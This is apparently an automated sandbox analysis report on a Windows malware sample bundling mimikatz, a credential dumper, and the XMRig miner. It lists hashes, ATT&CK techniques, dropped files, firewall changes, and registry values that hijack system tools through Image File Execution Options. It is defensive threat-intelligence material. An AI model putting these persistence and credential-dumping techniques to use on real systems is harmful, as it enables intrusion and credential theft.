mimikatz | 97dde424dd8e41f3d3f516cad2b476eefb0e31d9fcc818f832f1feb8a0f585b4

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 22:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe
Size

10.8MB
MD5

7007b9768f58f15f8a549db38beb005f
SHA1

5355eac95e58e136fcdef9fb77ffe913df83515f
SHA256

97dde424dd8e41f3d3f516cad2b476eefb0e31d9fcc818f832f1feb8a0f585b4
SHA512

f33e6cc7b93c85105b83d2980880fbff2d98c3fda1750afb3cd97ef7d76d8d2737716b48e6411ed561ff94299bdece52e45067371058e46c359c9f884838d6d2
SSDEEP

98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1328 created 2104	1328	iacqttm.exe	38

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (19664) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/memory/2808-178-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	xmrig
behavioral2/memory/2808-182-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	xmrig
behavioral2/memory/2808-199-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	xmrig
behavioral2/memory/2808-216-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	xmrig
behavioral2/memory/2808-222-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	xmrig
behavioral2/memory/2808-234-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	xmrig
behavioral2/memory/2808-249-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	xmrig
behavioral2/memory/2808-257-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	xmrig
behavioral2/memory/2808-278-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	xmrig
behavioral2/memory/2808-389-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/208-0-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/208-4-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/files/0x000700000002346b-6.dat	mimikatz
behavioral2/memory/4520-8-0x0000000000400000-0x0000000000AA4000-memory.dmp	mimikatz
behavioral2/memory/3548-138-0x00007FF6874C0000-0x00007FF6875AE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	iacqttm.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	iacqttm.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	iacqttm.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1772	netsh.exe
3652	netsh.exe

Executes dropped EXE 29 IoCs

pid	Process
4520	iacqttm.exe
1328	iacqttm.exe
4640	wpcap.exe
3636	evlwailif.exe
3548	vfshost.exe
2616	stiattrir.exe
4256	xohudmc.exe
2428	wooakm.exe
2808	rqwpbp.exe
4312	stiattrir.exe
1184	stiattrir.exe
1584	stiattrir.exe
3352	stiattrir.exe
3688	stiattrir.exe
3440	stiattrir.exe
4072	stiattrir.exe
2404	stiattrir.exe
1112	iacqttm.exe
3756	stiattrir.exe
1016	stiattrir.exe
2004	stiattrir.exe
1496	stiattrir.exe
4912	stiattrir.exe
2352	stiattrir.exe
3940	stiattrir.exe
3624	stiattrir.exe
1608	stiattrir.exe
824	dbqlbfrvt.exe
368	iacqttm.exe

Loads dropped DLL 12 IoCs

pid	Process
4640	wpcap.exe
4640	wpcap.exe
4640	wpcap.exe
4640	wpcap.exe
4640	wpcap.exe
4640	wpcap.exe
4640	wpcap.exe
4640	wpcap.exe
4640	wpcap.exe
3636	evlwailif.exe
3636	evlwailif.exe
3636	evlwailif.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
74	ifconfig.me
75	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	iacqttm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	iacqttm.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	iacqttm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	iacqttm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE	iacqttm.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wooakm.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	iacqttm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	iacqttm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	iacqttm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	iacqttm.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\wooakm.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	iacqttm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE	iacqttm.exe

UPX packed file 35 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000234c0-134.dat	upx
behavioral2/memory/3548-135-0x00007FF6874C0000-0x00007FF6875AE000-memory.dmp	upx
behavioral2/memory/3548-138-0x00007FF6874C0000-0x00007FF6875AE000-memory.dmp	upx
behavioral2/files/0x00070000000234cb-141.dat	upx
behavioral2/memory/2616-142-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/2616-155-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/files/0x00070000000234c8-164.dat	upx
behavioral2/memory/2808-165-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	upx
behavioral2/memory/4312-171-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/1184-175-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/2808-178-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	upx
behavioral2/memory/1584-180-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/2808-182-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	upx
behavioral2/memory/3352-185-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/3688-189-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/3440-193-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/4072-197-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/2808-199-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	upx
behavioral2/memory/2404-202-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/3756-210-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/1016-214-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/2808-216-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	upx
behavioral2/memory/2004-219-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/2808-222-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	upx
behavioral2/memory/1496-224-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/4912-228-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/2352-231-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/3940-233-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/2808-234-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	upx
behavioral2/memory/3624-236-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/1608-238-0x00007FF70D2E0000-0x00007FF70D33B000-memory.dmp	upx
behavioral2/memory/2808-249-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	upx
behavioral2/memory/2808-257-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	upx
behavioral2/memory/2808-278-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	upx
behavioral2/memory/2808-389-0x00007FF7B7C90000-0x00007FF7B7DB0000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\baerflpsi\ngfqdelbf\wpcap.exe	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\trfo-2.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\svschost.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\svschost.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\libxml2.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\xdvl-0.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\Corporate\mimilib.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\docmicfg.exe	iacqttm.exe
File created	C:\Windows\baerflpsi\ngfqdelbf\Packet.dll	iacqttm.exe
File created	C:\Windows\ctnikqfc\spoolsrv.xml	iacqttm.exe
File created	C:\Windows\ctnikqfc\vimpcsvc.xml	iacqttm.exe
File opened for modification	C:\Windows\ctnikqfc\spoolsrv.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\exma-1.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\posh-0.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\zlib1.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\vimpcsvc.exe	iacqttm.exe
File created	C:\Windows\baerflpsi\ngfqdelbf\ip.txt	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\svschost.exe	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\spoolsrv.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\spoolsrv.xml	iacqttm.exe
File created	C:\Windows\ctnikqfc\svschost.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\upbdrjv\swrpwe.exe	iacqttm.exe
File created	C:\Windows\baerflpsi\ngfqdelbf\wpcap.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\libeay32.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\tibe-2.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\schoedcl.exe	iacqttm.exe
File opened for modification	C:\Windows\ctnikqfc\schoedcl.xml	iacqttm.exe
File opened for modification	C:\Windows\baerflpsi\Corporate\log.txt	cmd.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\spoolsrv.exe	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\schoedcl.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\ssleay32.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\tucl-1.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\vimpcsvc.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\schoedcl.xml	iacqttm.exe
File opened for modification	C:\Windows\ctnikqfc\docmicfg.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\ngfqdelbf\evlwailif.exe	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\trch-1.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\ucl.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\vimpcsvc.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\AppCapture64.dll	iacqttm.exe
File created	C:\Windows\ime\iacqttm.exe	iacqttm.exe
File created	C:\Windows\ctnikqfc\iacqttm.exe	2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe
File opened for modification	C:\Windows\ctnikqfc\iacqttm.exe	2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\crli-0.dll	iacqttm.exe
File created	C:\Windows\ctnikqfc\docmicfg.xml	iacqttm.exe
File opened for modification	C:\Windows\ctnikqfc\svschost.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\Shellcode.ini	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\docmicfg.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\ngfqdelbf\scan.bat	iacqttm.exe
File opened for modification	C:\Windows\baerflpsi\ngfqdelbf\Result.txt	dbqlbfrvt.exe
File created	C:\Windows\baerflpsi\ngfqdelbf\dbqlbfrvt.exe	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\AppCapture32.dll	iacqttm.exe
File opened for modification	C:\Windows\baerflpsi\ngfqdelbf\Packet.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\cnli-1.dll	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\docmicfg.xml	iacqttm.exe
File created	C:\Windows\baerflpsi\Corporate\vfshost.exe	iacqttm.exe
File created	C:\Windows\baerflpsi\Corporate\mimidrv.sys	iacqttm.exe
File created	C:\Windows\baerflpsi\UnattendGC\specials\coli-0.dll	iacqttm.exe
File created	C:\Windows\ctnikqfc\schoedcl.xml	iacqttm.exe
File opened for modification	C:\Windows\ctnikqfc\vimpcsvc.xml	iacqttm.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
696	sc.exe
4280	sc.exe
4484	sc.exe
468	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
